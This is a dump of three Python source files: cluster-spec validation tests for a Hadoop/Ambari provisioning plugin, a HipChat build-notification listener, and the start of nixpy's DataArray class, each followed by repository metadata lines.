server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1],
["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER", "GANGLIA_MONITOR",
"NAGIOS_SERVER", "AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2],
["TASKTRACKER", "DATANODE",
"AMBARI_AGENT", "GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
ambari_service = next(service for service in cluster_config.services
if service.name == 'AMBARI')
users = ambari_service.users
self.assertEqual(1, len(users))
self.assertEqual('new-pwd', users[0].password)
def test_update_ambari_admin_user_and_password(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_user_input_config = TestUserInputConfig('ambari-stack', 'AMBARI',
'ambari.admin.user')
pwd_user_input_config = TestUserInputConfig('ambari-stack', 'AMBARI',
'ambari.admin.password')
user_user_input = provisioning.UserInput(user_user_input_config,
'new-admin_user')
pwd_user_input = provisioning.UserInput(pwd_user_input_config,
'new-admin_pwd')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'one', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'two', [server2], ["TASKTRACKER", "DATANODE",
"AMBARI_AGENT", "GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(
cluster, [user_user_input, pwd_user_input])
ambari_service = next(service for service in cluster_config.services
if service.name == 'AMBARI')
users = ambari_service.users
self.assertEqual(1, len(users))
self.assertEqual('new-admin_user', users[0].name)
self.assertEqual('new-admin_pwd', users[0].password)
def test_validate_missing_hdfs(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["TASKTRACKER", "MAPREDUCE_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["JOBTRACKER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing hdfs service
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.RequiredServiceMissingException:
# expected
pass
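    # The try/fail/except pattern used throughout these validation tests is
    # equivalent to the context-manager form below (sketch only, not what the
    # suite actually uses):
    #   with self.assertRaises(ex.RequiredServiceMissingException):
    #       cluster_config.create_operational_config(cluster, [])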
def test_validate_missing_mr(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["NAMENODE"])
node_group2 = TestNodeGroup(
'master', [server2], ["DATANODE"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing mr service
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.RequiredServiceMissingException:
# expected
pass
def test_validate_missing_ambari(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["NAMENODE", "JOBTRACKER"])
node_group2 = TestNodeGroup(
'master', [server2], ["DATANODE", "TASKTRACKER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing ambari service
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.RequiredServiceMissingException:
# expected
pass
# TODO(jspeidel): move validate_* to test_services when validate
# is called independently of cluspterspec
def test_validate_hdfs(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"HDFS_CLIENT", "MAPREDUCE_CLIENT"], 1)
node_group2 = TestNodeGroup(
'master', [server2], ["JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing NN
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 NN
node_group3 = TestNodeGroup(
'master2', [server2], ["NAMENODE"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_mr(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"HDFS_CLIENT", "MAPREDUCE_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing JT
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 JT
node_group3 = TestNodeGroup(
'master', [server2], ["JOBTRACKER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
# should cause validation exception due to 2 NN
node_group3 = TestNodeGroup(
'master', [server2], ["NAMENODE"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
# should fail due to no TT
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "HDFS_CLIENT",
"MAPREDUCE_CLIENT"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
        # should fail due to missing TT
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_hive(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"HIVE_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing hive_server
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"HIVE_SERVER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 HIVE_SERVER
node_group3 = TestNodeGroup(
'master', [server2], ["HIVE_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_zk(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
server3 = base.TestServer('host3', 'master', '11113', 3,
'111.11.1113', '222.22.2224')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"ZOOKEEPER_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing ZOOKEEPER_SERVER
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"ZOOKEEPER_SERVER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should allow multiple ZOOKEEPER_SERVER processes
node_group3 = TestNodeGroup(
'zkserver', [server3], ["ZOOKEEPER_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
cluster_config.create_operational_config(cluster, [])
def test_validate_oozie(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"OOZIE_CLIENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing OOZIE_SERVER
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"OOZIE_SERVER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 OOZIE_SERVER
node_group3 = TestNodeGroup(
'master', [server2], ["OOZIE_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_ganglia(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"GANGLIA_MONITOR"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing GANGLIA_SERVER
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"GANGLIA_SERVER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 GANGLIA_SERVER
node_group3 = TestNodeGroup(
'master2', [server2], ["GANGLIA_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_ambari(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should fail due to missing AMBARI_SERVER
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# should validate successfully now
cluster_config.create_operational_config(cluster, [])
# should cause validation exception due to 2 AMBARI_SERVER
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
node_group3 = TestNodeGroup(
'master', [server2], ["AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2, node_group3])
cluster_config = base.create_clusterspec()
try:
cluster_config.create_operational_config(cluster, [])
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_validate_scaling_existing_ng(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER",
"AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# sanity check that original config validates
cluster_config.create_operational_config(cluster, [])
cluster_config = base.create_clusterspec()
scaled_groups = {'master': 2}
# should fail due to 2 JT
try:
cluster_config.create_operational_config(
cluster, [], scaled_groups)
self.fail('Validation should have thrown an exception')
except ex.InvalidComponentCountException:
# expected
pass
def test_scale(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER",
"AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# sanity check that original config validates
cluster_config.create_operational_config(cluster, [])
slave_ng = cluster_config.node_groups['slave']
self.assertEqual(1, slave_ng.count)
cluster_config.scale({'slave': 2})
self.assertEqual(2, slave_ng.count)
def test_get_deployed_configurations(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
node_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER"])
node_group2 = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([node_group, node_group2])
cluster_config = base.create_clusterspec()
# sanity check that original config validates
cluster_config.create_operational_config(cluster, [])
configs = cluster_config.get_deployed_configurations()
expected_configs = set(['mapred-site', 'ambari', 'hdfs-site',
'global', 'core-site'])
self.assertEqual(expected_configs, expected_configs & configs)
def test_get_deployed_node_group_count(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
slave_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER"])
slave2_group = TestNodeGroup(
'slave2', [server], ["DATANODE", "TASKTRACKER"])
master_group = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([master_group, slave_group, slave2_group])
cluster_config = base.create_clusterspec()
cluster_config.create_operational_config(cluster, [])
self.assertEqual(2, cluster_config.get_deployed_node_group_count(
'DATANODE'))
self.assertEqual(1, cluster_config.get_deployed_node_group_count(
'AMBARI_SERVER'))
def test_get_node_groups_containing_component(self, patched):
server = base.TestServer('host1', 'slave', '11111', 3,
'111.11.1111', '222.22.2222')
server2 = base.TestServer('host2', 'master', '11112', 3,
'111.11.1112', '222.22.2223')
slave_group = TestNodeGroup(
'slave', [server], ["DATANODE", "TASKTRACKER"])
slave2_group = TestNodeGroup(
'slave2', [server], ["DATANODE", "TASKTRACKER"])
master_group = TestNodeGroup(
'master', [server2], ["NAMENODE", "JOBTRACKER", "AMBARI_SERVER"])
cluster = base.TestCluster([master_group, slave_group, slave2_group])
cluster_config = base.create_clusterspec()
cluster_config.create_operational_config(cluster, [])
datanode_ngs = cluster_config.get_node_groups_containing_component(
'DATANODE')
self.assertEqual(2, len(datanode_ngs))
ng_names = set([datanode_ngs[0].name, datanode_ngs[1].name])
self.assertIn('slave', ng_names)
self.assertIn('slave2', ng_names)
def test_get_components_for_type(self, patched):
cluster_config = base.create_clusterspec()
clients = cluster_config.get_components_for_type('CLIENT')
slaves = cluster_config.get_components_for_type('SLAVE')
masters = cluster_config.get_components_for_type('MASTER')
expected_clients = set(['HCAT', 'ZOOKEEPER_CLIENT',
'MAPREDUCE_CLIENT', 'HIVE_CLIENT',
'HDFS_CLIENT', 'PIG'])
self.assertEqual(expected_clients, expected_clients & set(clients))
expected_slaves = set(['AMBARI_AGENT', 'TASKTRACKER', 'DATANODE',
'GANGLIA_MONITOR'])
self.assertEqual(expected_slaves, expected_slaves & set(slaves))
expected_masters = set(['SECONDARY_NAMENODE', 'HIVE_METASTORE',
'AMBARI_SERVER', 'JOBTRACKER',
'WEBHCAT_SERVER', 'NAGIOS_SERVER',
'MYSQL_SERVER', 'ZOOKEEPER_SERVER',
'NAMENODE', 'HIVE_SERVER', 'GANGLIA_SERVER'])
self.assertEqual(expected_masters, expected_masters & set(masters))
def _assert_services(self, services):
found_services = []
for service in services:
name = service.name
found_services.append(name)
self.service_validators[name](service)
self.assertEqual(13, len(found_services))
self.assertIn('HDFS', found_services)
self.assertIn('MAPREDUCE', found_services)
self.assertIn('GANGLIA', found_services)
self.assertIn('NAGIOS', found_services)
self.assertIn('AMBARI', found_services)
self.assertIn('PIG', found_services)
self.assertIn('HIVE', found_services)
self.assertIn('HCATALOG', found_services)
self.assertIn('ZOOKEEPER', found_services)
self.assertIn('WEBHCAT', found_services)
self.assertIn('OOZIE', found_services)
self.assertIn('SQOOP', found_services)
self.assertIn('HBASE', found_services)
def _assert_hdfs(self, service):
self.assertEqual('HDFS', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(4, len(found_components))
self._assert_component('NAMENODE', 'MASTER', "1",
found_components['NAMENODE'])
self._assert_component('DATANODE', 'SLAVE', "1+",
found_components['DATANODE'])
self._assert_component('SECONDARY_NAMENODE', 'MASTER', "1",
found_components['SECONDARY_NAMENODE'])
self._assert_component('HDFS_CLIENT', 'CLIENT', "1+",
found_components['HDFS_CLIENT'])
# TODO(jspeidel) config
def _assert_mr(self, service):
self.assertEqual('MAPREDUCE', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(4, len(found_components))
self._assert_component('JOBTRACKER', 'MASTER', "1",
found_components['JOBTRACKER'])
self._assert_component('TASKTRACKER', 'SLAVE', "1+",
found_components['TASKTRACKER'])
self._assert_component('MAPREDUCE_CLIENT', 'CLIENT', "1+",
found_components['MAPREDUCE_CLIENT'])
self._assert_component('HISTORYSERVER', 'MASTER', "1",
found_components['HISTORYSERVER'])
# TODO(jspeidel) config
def _assert_nagios(self, service):
self.assertEqual('NAGIOS', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(1, len(found_components))
self._assert_component('NAGIOS_SERVER', 'MASTER', "1",
found_components['NAGIOS_SERVER'])
def _assert_ganglia(self, service):
self.assertEqual('GANGLIA', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(2, len(found_components))
self._assert_component('GANGLIA_SERVER', 'MASTER', "1",
found_components['GANGLIA_SERVER'])
self._assert_component('GANGLIA_MONITOR', 'SLAVE', "1+",
found_components['GANGLIA_MONITOR'])
def _assert_ambari(self, service):
self.assertEqual('AMBARI', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(2, len(found_components))
self._assert_component('AMBARI_SERVER', 'MASTER', "1",
found_components['AMBARI_SERVER'])
self._assert_component('AMBARI_AGENT', 'SLAVE', "1+",
found_components['AMBARI_AGENT'])
self.assertEqual(1, len(service.users))
user = service.users[0]
self.assertEqual('admin', user.name)
self.assertEqual('admin', user.password)
groups = user.groups
self.assertEqual(1, len(groups))
self.assertIn('admin', groups)
def _assert_pig(self, service):
self.assertEqual('PIG', service.name)
self.assertEqual(1, len(service.components))
self.assertEqual('PIG', service.components[0].name)
def _assert_hive(self, service):
self.assertEqual('HIVE', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(4, len(found_components))
self._assert_component('HIVE_SERVER', 'MASTER', "1",
found_components['HIVE_SERVER'])
self._assert_component('HIVE_METASTORE', 'MASTER', "1",
found_components['HIVE_METASTORE'])
self._assert_component('MYSQL_SERVER', 'MASTER', "1",
found_components['MYSQL_SERVER'])
self._assert_component('HIVE_CLIENT', 'CLIENT', "1+",
found_components['HIVE_CLIENT'])
def _assert_hcatalog(self, service):
self.assertEqual('HCATALOG', service.name)
self.assertEqual(1, len(service.components))
self.assertEqual('HCAT', service.components[0].name)
def _assert_zookeeper(self, service):
self.assertEqual('ZOOKEEPER', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(2, len(found_components))
self._assert_component('ZOOKEEPER_SERVER', 'MASTER', "1+",
found_components['ZOOKEEPER_SERVER'])
self._assert_component('ZOOKEEPER_CLIENT', 'CLIENT', "1+",
found_components['ZOOKEEPER_CLIENT'])
def _assert_webhcat(self, service):
self.assertEqual('WEBHCAT', service.name)
self.assertEqual(1, len(service.components))
self.assertEqual('WEBHCAT_SERVER', service.components[0].name)
def _assert_oozie(self, service):
self.assertEqual('OOZIE', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(2, len(found_components))
self._assert_component('OOZIE_SERVER', 'MASTER', "1",
found_components['OOZIE_SERVER'])
self._assert_component('OOZIE_CLIENT', 'CLIENT', "1+",
found_components['OOZIE_CLIENT'])
def _assert_sqoop(self, service):
self.assertEqual('SQOOP', service.name)
self.assertEqual(1, len(service.components))
self.assertEqual('SQOOP', service.components[0].name)
def _assert_hbase(self, service):
self.assertEqual('HBASE', service.name)
found_components = {}
for component in service.components:
found_components[component.name] = component
self.assertEqual(3, len(found_components))
self._assert_component('HBASE_MASTER', 'MASTER', "1",
found_components['HBASE_MASTER'])
self._assert_component('HBASE_REGIONSERVER', 'SLAVE', "1+",
found_components['HBASE_REGIONSERVER'])
self._assert_component('HBASE_CLIENT', 'CLIENT', "1+",
found_components['HBASE_CLIENT'])
def _assert_component(self, name, comp_type, cardinality, component):
self.assertEqual(name, component.name)
self.assertEqual(comp_type, component.type)
self.assertEqual(cardinality, component.cardinality)
def _assert_configurations(self, configurations):
self.assertEqual(9, len(configurations))
self.assertIn('global', configurations)
self.assertIn('core-site', configurations)
self.assertIn('mapred-site', configurations)
self.assertIn('hdfs-site', configurations)
self.assertIn('ambari', configurations)
self.assertIn('webhcat-site', configurations)
self.assertIn('hive-site', configurations)
self.assertIn('oozie-site', configurations)
self.assertIn('hbase-site', configurations)
class TestNodeGroup(object):
def __init__(self, name, instances, node_processes, count=1):
self.name = name
self.instances = instances
for i in instances:
i.node_group = self
self.node_processes = node_processes
self.count = count
self.id = name
def storage_paths(self):
return ['']
class TestUserInputConfig(object):
def __init__(self, tag, target, name):
self.tag = tag
self.applicable_target = target
self.name = name
| apache-2.0 | -4,165,563,385,657,736,700 | 43.857235 | 79 | 0.563646 | false |
alex/changes | changes/listeners/hipchat.py | 1 | 3156 | import json
import logging
import requests
from flask import current_app
from changes.config import db
from changes.constants import Result, Status
from changes.models import Build, ProjectOption, Source
from changes.utils.http import build_uri
logger = logging.getLogger('hipchat')
DEFAULT_TIMEOUT = 1
API_ENDPOINT = 'https://api.hipchat.com/v1/rooms/message'
def get_options(project_id):
return dict(
db.session.query(
ProjectOption.name, ProjectOption.value
).filter(
ProjectOption.project_id == project_id,
ProjectOption.name.in_([
'hipchat.notify', 'hipchat.room',
])
)
)
def should_notify(build):
if build.result not in (Result.failed, Result.passed):
return
parent = Build.query.join(
Source, Source.id == Build.source_id,
).filter(
Source.patch_id == None, # NOQA
Source.revision_sha != build.source.revision_sha,
Build.project == build.project,
Build.date_created < build.date_created,
Build.status == Status.finished,
Build.result.in_([Result.passed, Result.failed]),
).order_by(Build.date_created.desc()).first()
if parent is None:
return build.result == Result.failed
if parent.result == build.result:
return False
return True
def build_finished_handler(build_id, **kwargs):
build = Build.query.get(build_id)
if build is None:
return
if build.source.patch_id:
return
if not current_app.config.get('HIPCHAT_TOKEN'):
return
if not should_notify(build):
return
options = get_options(build.project_id)
if options.get('hipchat.notify', '0') != '1':
return
if not options.get('hipchat.room'):
return
message = u'Build {result} - <a href="{link}">{project} #{number}</a> ({target})'.format(
number='{0}'.format(build.number),
result=unicode(build.result),
target=build.target or build.source.revision_sha or 'Unknown',
project=build.project.name,
link=build_uri('/projects/{0}/builds/{1}/'.format(
build.project.slug, build.id.hex))
)
if build.author:
message += ' - {author}'.format(
author=build.author.email,
)
send_payload(
token=current_app.config['HIPCHAT_TOKEN'],
room=options['hipchat.room'],
message=message,
notify=True,
color='green' if build.result == Result.passed else 'red',
)
def send_payload(token, room, message, notify, color='red',
timeout=DEFAULT_TIMEOUT):
data = {
'auth_token': token,
'room_id': room,
'from': 'Changes',
'message': message,
'notify': int(notify),
'color': color,
}
response = requests.post(API_ENDPOINT, data=data, timeout=timeout)
response_data = json.loads(response.content)
if 'status' not in response_data:
logger.error('Unexpected response: %s', response_data)
    elif response_data['status'] != 'sent':
        logger.error('Event could not be sent to hipchat')
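# --- Illustrative sketch (not part of the original listener) ---
# send_payload() above posts to HipChat's v1 rooms/message endpoint. The
# guarded call below only shows the expected arguments; the token and room
# values are hypothetical placeholders, not values used by this project.
if __name__ == '__main__':
    send_payload(
        token='0123456789abcdef',  # hypothetical v1 API token
        room='Engineering',        # hypothetical room name or id
        message='Build passed - example',
        notify=True,
        color='green',
    )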
| apache-2.0 | 6,745,039,586,604,910,000 | 26.206897 | 93 | 0.611217 | false |
stoewer/nixpy | nixio/pycore/data_array.py | 1 | 8360 | # Copyright (c) 2016, German Neuroinformatics Node (G-Node)
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted under the terms of the BSD License. See
# LICENSE file in the root of the Project.
from numbers import Number
from .entity_with_sources import EntityWithSources
from ..data_array import DataArrayMixin, DataSetMixin
from ..value import DataType
from .dimensions import (SampledDimension, RangeDimension, SetDimension,
DimensionType)
from . import util
from .exceptions import InvalidUnit
class DataSet(DataSetMixin):
def _write_data(self, data, count, offset):
dataset = self._h5group.get_dataset("data")
dataset.write_data(data, count, offset)
def _read_data(self, data, count, offset):
dataset = self._h5group.get_dataset("data")
dataset.read_data(data, count, offset)
@property
def data_extent(self):
"""
The size of the data.
:type: set of int
"""
dataset = self._h5group.get_dataset("data")
return dataset.shape
@data_extent.setter
def data_extent(self, extent):
dataset = self._h5group.get_dataset("data")
dataset.shape = extent
@property
def data_type(self):
"""
The data type of the data stored in the DataArray. This is a read only
property.
:type: DataType
"""
return self._get_dtype()
def _get_dtype(self):
dataset = self._h5group.get_dataset("data")
return dataset.dtype
class DataArray(EntityWithSources, DataSet, DataArrayMixin):
def __init__(self, nixparent, h5group):
super(DataArray, self).__init__(nixparent, h5group)
@classmethod
def _create_new(cls, nixparent, h5parent, name, type_, data_type, shape):
newentity = super(DataArray, cls)._create_new(nixparent, h5parent,
name, type_)
newentity._h5group.create_dataset("data", shape, data_type)
return newentity
def _read_data(self, data, count, offset):
coeff = self.polynom_coefficients
origin = self.expansion_origin
if len(coeff) or origin:
if not origin:
origin = 0.0
super(DataArray, self)._read_data(data, count, offset)
util.apply_polynomial(coeff, origin, data)
else:
super(DataArray, self)._read_data(data, count, offset)
def append_set_dimension(self):
"""
Append a new SetDimension to the list of existing dimension
descriptors.
:returns: The newly created SetDimension.
:rtype: SetDimension
"""
dimgroup = self._h5group.open_group("dimensions")
index = len(dimgroup) + 1
return SetDimension._create_new(dimgroup, index)
def append_sampled_dimension(self, sampling_interval):
"""
Append a new SampledDimension to the list of existing dimension
descriptors.
:param sampling_interval: The sampling interval of the SetDimension
to create.
:type sampling_interval: float
:returns: The newly created SampledDimension.
:rtype: SampledDimension
"""
dimgroup = self._h5group.open_group("dimensions")
index = len(dimgroup) + 1
return SampledDimension._create_new(dimgroup, index, sampling_interval)
def append_range_dimension(self, ticks):
"""
Append a new RangeDimension to the list of existing dimension
descriptors.
